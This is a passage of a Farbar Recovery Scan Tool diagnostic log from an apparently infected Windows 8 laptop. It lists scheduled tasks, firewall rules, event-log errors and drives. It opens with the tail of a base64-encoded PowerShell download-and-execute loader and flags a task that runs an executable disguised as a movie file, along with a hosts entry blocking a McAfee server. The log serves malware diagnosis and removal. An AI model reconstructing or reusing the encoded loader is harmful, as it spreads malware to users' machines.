QAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA= (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\windows\Tasks\VoiceBook.job => c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107}\blackhat+%282015%29+%5b1080p%5d.exe <==== ATTENTION ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) ==================== Loaded Modules (Whitelisted) ============== 2015-01-04 12:19 - 2015-10-13 04:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll 2013-09-07 03:48 - 2013-09-07 03:48 - 00011264 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\ActivateDesktopDebugger\ActivateDesktopDebugger.dll 2013-09-07 03:45 - 2013-09-07 03:45 - 00086016 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\Map\MAP.dll 2013-09-07 03:52 - 2013-09-07 03:52 - 00012928 _____ () C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe 2015-09-04 18:54 - 2015-08-31 13:53 - 15127440 ___SH () C:\ProgramData\grint.exe 2015-07-21 16:02 - 2015-07-21 16:02 - 00557056 _____ () C:\Program Files (x86)\Trusteer\Rapport\bin\js32.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) AlternateDataStreams: C:\Windows:nlsPreferences ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver" ==================== EXE Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2013-08-22 08:25 - 2015-12-15 21:29 - 00000858 ____A C:\windows\system32\Drivers\etc\hosts 0.0.0.1 mssplus.mcafee.com ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-4067499190-4158452651-832932472-1001\Control Panel\Desktop\\Wallpaper -> C:\windows\Web\Wallpaper\Lenovo\LenovoWallPaper.jpg DNS Servers: Media is not connected to internet. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == (Currently there is no automatic fix for this section.) MSCONFIG\Services: AtherosSvc => 2 MSCONFIG\Services: cphs => 3 MSCONFIG\Services: HomeNetSvc => 2 MSCONFIG\Services: Intel(R) Capability Licensing Service Interface => 2 MSCONFIG\Services: Intel(R) Capability Licensing Service TCP IP Interface => 3 MSCONFIG\Services: Intel(R) ME Service => 2 MSCONFIG\Services: jhi_service => 2 MSCONFIG\Services: LMS => 2 MSCONFIG\Services: McAfee SiteAdvisor Service => 2 MSCONFIG\Services: mccspsvc => 2 MSCONFIG\Services: McMPFSvc => 2 MSCONFIG\Services: McNaiAnn => 2 MSCONFIG\Services: McODS => 3 MSCONFIG\Services: mcpltsvc => 2 MSCONFIG\Services: McProxy => 2 MSCONFIG\Services: MSK80Service => 2 MSCONFIG\Services: NitroDriverReadSpool8 => 2 MSCONFIG\Services: nlsX86cc => 2 MSCONFIG\Services: VeriFaceSrv => 2 MSCONFIG\Services: ZAtheros Bt and Wlan Coex Agent => 2 HKLM\...\StartupApproved\Run32: => "ConnectionCenter" HKLM\...\StartupApproved\Run32: => "Redirector" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [{3E288B4C-F503-4660-9255-E6B0323AD6F4}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe FirewallRules: [{2580EFB6-F603-4CD6-951A-1C28E3BAFCB9}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe FirewallRules: [{9A537DDB-65B7-4EC6-82F3-884D259177CC}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe FirewallRules: [{537C8ACE-5AED-40ED-8E1C-8F9B2857DE2F}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe FirewallRules: [{D6E34823-7BE8-4C5E-94E3-C68D8216AE59}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe FirewallRules: [{AD4A2BF6-B70C-482D-A6DD-AAEEBA5042CB}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe FirewallRules: [{82172099-59EA-437B-A6E9-C15FB75BA6B4}] => (Allow) C:\Program Files (x86)\Lenovo\PowerDVD10\PowerDVD Cinema\PowerDVDCinema10.exe FirewallRules: [{4C2F8C0D-0702-4C2C-92EE-30CBCF7EA5E1}] => (Allow) C:\Program Files (x86)\Lenovo\PowerDVD10\PowerDVD10.EXE FirewallRules: [{881509AD-ECB4-4D80-934B-FC50C9C3007D}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe FirewallRules: [{05F66C03-0820-47DF-B925-7B3E67E2CE83}] => (Allow) C:\Users\archer\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe FirewallRules: [{536BB3B9-975A-4E85-9AE4-316136E5D756}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe FirewallRules: [{34EBC165-AAAA-4E21-9986-E76D3FDC38D6}] => (Allow) C:\Users\archer\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{15101AD0-6355-41F8-BB36-F3784D945A39}] => (Allow) C:\Users\archer\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{EB2F993D-41E9-4961-9D47-4CE03055988F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe FirewallRules: [{C0CA8D8B-F6C0-4659-9442-E83935F7C4DF}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe FirewallRules: [{28A4D00F-F0E4-4269-A988-78DFA2BB32BD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe FirewallRules: [{07E5382D-1227-41A6-BF5F-47C40EEED4C5}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe FirewallRules: [{3AE66150-E342-4A56-B423-91C10BF2D8D9}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcopy2.exe FirewallRules: [{90DA7392-9395-4F46-9843-E7274B6BF184}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe FirewallRules: [{D2291443-6A79-4DB5-A754-CD5FB9F9AA8F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqnrs08.exe FirewallRules: [{C793B00E-A508-4562-BF67-3AC0C12095A4}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe FirewallRules: [{1CEBB8DD-BE9F-4FBD-8295-084413F45FCD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe FirewallRules: [{770C4160-31D0-4984-83A0-7A4196B5DBB5}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe FirewallRules: [{F98C8D66-9C42-4A0F-AD99-DD649DBCB948}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe FirewallRules: [{6A40D019-F107-4BB0-B983-59315DEABFB0}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe FirewallRules: [{1E0EA987-F4D3-4B79-99FE-72856E65771E}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe FirewallRules: [{2ACDA006-119A-410F-AF0A-BA5EBC68D033}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{2B0E20FE-A008-4E0D-AE3A-0BE604A24471}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{EB849959-AC0F-4DDF-BCDE-BF62FAD72BE1}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{6DE61492-03F6-47BD-BA7D-439F624DDAF7}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{3F3E1D19-3EFA-490D-A025-97FE3E183CF7}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Restore Points ========================= 08-12-2015 10:21:12 Scheduled Checkpoint 21-12-2015 13:52:16 Installed Rapport 28-12-2015 16:49:23 Scheduled Checkpoint ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (01/01/2016 10:30:08 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: UMonit64.exe, version: 13.0.0.0, time stamp: 0x52007056 Faulting module name: ustor.dll, version: 6.3.9600.17936, time stamp: 0x55a68dd1 Exception code: 0xc0000135 Fault offset: 0x0009d4f2 Faulting process id: 0x1480 Faulting application start time: 0xUMonit64.exe0 Faulting application path: UMonit64.exe1 Faulting module path: UMonit64.exe2 Report Id: UMonit64.exe3 Faulting package full name: UMonit64.exe4 Faulting package-relative application ID: UMonit64.exe5 Error: (01/01/2016 10:19:43 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: UMonit64.exe, version: 13.0.0.0, time stamp: 0x52007056 Faulting module name: ustor.dll, version: 6.3.9600.17936, time stamp: 0x55a68dd1 Exception code: 0xc0000135 Fault offset: 0x0009d4f2 Faulting process id: 0x1780 Faulting application start time: 0xUMonit64.exe0 Faulting application path: UMonit64.exe1 Faulting module path: UMonit64.exe2 Report Id: UMonit64.exe3 Faulting package full name: UMonit64.exe4 Faulting package-relative application ID: UMonit64.exe5 Error: (12/31/2015 11:19:37 PM) (Source: System Restore) (EventID: 8200) (User: ) Description: Failed to initiate System Restore (Scheduled Checkpoint). Error: (12/31/2015 11:05:17 PM) (Source: System Restore) (EventID: 8200) (User: ) Description: Failed to initiate System Restore (Scheduled Checkpoint). Error: (12/31/2015 11:04:25 PM) (Source: System Restore) (EventID: 8200) (User: ) Description: Failed to initiate System Restore (Scheduled Checkpoint). Error: (12/31/2015 10:44:55 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: UMonit64.exe, version: 13.0.0.0, time stamp: 0x52007056 Faulting module name: ustor.dll, version: 6.3.9600.17936, time stamp: 0x55a68dd1 Exception code: 0xc0000135 Fault offset: 0x0009d4f2 Faulting process id: 0xbec Faulting application start time: 0xUMonit64.exe0 Faulting application path: UMonit64.exe1 Faulting module path: UMonit64.exe2 Report Id: UMonit64.exe3 Faulting package full name: UMonit64.exe4 Faulting package-relative application ID: UMonit64.exe5 Error: (12/31/2015 10:37:10 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: UMonit64.exe, version: 13.0.0.0, time stamp: 0x52007056 Faulting module name: ustor.dll, version: 6.3.9600.17936, time stamp: 0x55a68dd1 Exception code: 0xc0000135 Fault offset: 0x0009d4f2 Faulting process id: 0xe4 Faulting application start time: 0xUMonit64.exe0 Faulting application path: UMonit64.exe1 Faulting module path: UMonit64.exe2 Report Id: UMonit64.exe3 Faulting package full name: UMonit64.exe4 Faulting package-relative application ID: UMonit64.exe5 Error: (12/31/2015 10:14:33 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: UMonit64.exe, version: 13.0.0.0, time stamp: 0x52007056 Faulting module name: ustor.dll, version: 6.3.9600.17936, time stamp: 0x55a68dd1 Exception code: 0xc0000135 Fault offset: 0x0009d4f2 Faulting process id: 0xb1c Faulting application start time: 0xUMonit64.exe0 Faulting application path: UMonit64.exe1 Faulting module path: UMonit64.exe2 Report Id: UMonit64.exe3 Faulting package full name: UMonit64.exe4 Faulting package-relative application ID: UMonit64.exe5 Error: (12/31/2015 10:03:26 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: UMonit64.exe, version: 13.0.0.0, time stamp: 0x52007056 Faulting module name: ustor.dll, version: 6.3.9600.17936, time stamp: 0x55a68dd1 Exception code: 0xc0000135 Fault offset: 0x0009d4f2 Faulting process id: 0x116c Faulting application start time: 0xUMonit64.exe0 Faulting application path: UMonit64.exe1 Faulting module path: UMonit64.exe2 Report Id: UMonit64.exe3 Faulting package full name: UMonit64.exe4 Faulting package-relative application ID: UMonit64.exe5 Error: (12/31/2015 09:51:23 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: UMonit64.exe, version: 13.0.0.0, time stamp: 0x52007056 Faulting module name: ustor.dll, version: 6.3.9600.17936, time stamp: 0x55a68dd1 Exception code: 0xc0000135 Fault offset: 0x0009d4f2 Faulting process id: 0x1ac4 Faulting application start time: 0xUMonit64.exe0 Faulting application path: UMonit64.exe1 Faulting module path: UMonit64.exe2 Report Id: UMonit64.exe3 Faulting package full name: UMonit64.exe4 Faulting package-relative application ID: UMonit64.exe5 System errors: ============= Error: (01/01/2016 12:02:09 PM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY) Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ROOT". The corrupted index block is located at Vcn 0xffffffffffffffff, Lcn 0xffffffffffffffff. The corruption begins at offset 64 within the index block. Error: (01/01/2016 11:30:12 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY) Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ROOT". The corrupted index block is located at Vcn 0xffffffffffffffff, Lcn 0xffffffffffffffff. The corruption begins at offset 64 within the index block. Error: (01/01/2016 11:19:24 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY) Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ALLOCATION". Error: (01/01/2016 11:19:20 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY) Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ROOT". The corrupted index block is located at Vcn 0xffffffffffffffff, Lcn 0xffffffffffffffff. The corruption begins at offset 64 within the index block. Error: (01/01/2016 11:14:18 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY) Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ROOT". The corrupted index block is located at Vcn 0xffffffffffffffff, Lcn 0xffffffffffffffff. The corruption begins at offset 64 within the index block. Error: (01/01/2016 10:45:01 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY) Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ALLOCATION". Error: (01/01/2016 10:44:43 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY) Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ROOT". The corrupted index block is located at Vcn 0xffffffffffffffff, Lcn 0xffffffffffffffff. The corruption begins at offset 64 within the index block. Error: (01/01/2016 10:30:08 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY) Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ROOT". The corrupted index block is located at Vcn 0xffffffffffffffff, Lcn 0xffffffffffffffff. The corruption begins at offset 64 within the index block. Error: (01/01/2016 10:28:47 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable Error: (01/01/2016 10:19:36 AM) (Source: Ntfs) (EventID: 55) (User: NT AUTHORITY) Description: A corruption was discovered in the file system structure on volume Windows8_OS. A corruption was found in a file system index structure. The file reference number is 0x9000000000009. The name of the file is "". The corrupted index attribute is ":$SII:$INDEX_ROOT". The corrupted index block is located at Vcn 0xffffffffffffffff, Lcn 0xffffffffffffffff. The corruption begins at offset 64 within the index block. CodeIntegrity: =================================== Date: 2015-12-22 19:54:59.725 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system. Date: 2015-08-12 21:24:57.634 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system. Date: 2015-08-12 21:24:56.466 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system. Date: 2015-08-12 21:24:55.296 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system. Date: 2015-08-12 20:58:41.685 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system. Date: 2015-08-12 20:55:35.952 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system. Date: 2015-08-12 20:55:34.628 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system. Date: 2015-08-12 20:55:33.232 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system. Date: 2015-02-26 18:49:17.365 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel(R) Core(TM) i5-4200U CPU @ 1.60GHz Percentage of memory in use: 29% Total physical RAM: 6045.1 MB Available physical RAM: 4232.28 MB Total Virtual: 7005.1 MB Available Virtual: 4953.86 MB ==================== Drives ================================ Drive c: (Windows8_OS) (Fixed) (Total:891.47 GB) (Free:831.97 GB) NTFS ==>[system with boot components (obtained from drive)] Drive d: (LENOVO) (Fixed) (Total:25 GB) (Free:22.64 GB) NTFS Drive e: (melanie fernande) (CDROM) (Total:0.5 GB) (Free:0 GB) UDF Drive f: () (Removable) (Total:1.86 GB) (Free:0.78 GB) FAT32 ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (Size: 931.5 GB) (Disk ID: 1F826A6C) Partition: GPT. ======================================================== Disk: 1 (MBR Code: Windows XP) (Size: 1.9 GB) (Disk ID: C3072E18) Partition 1: (Active) - (Size=1.9 GB) - (Type=0B) ==================== End of Addition.txt ============================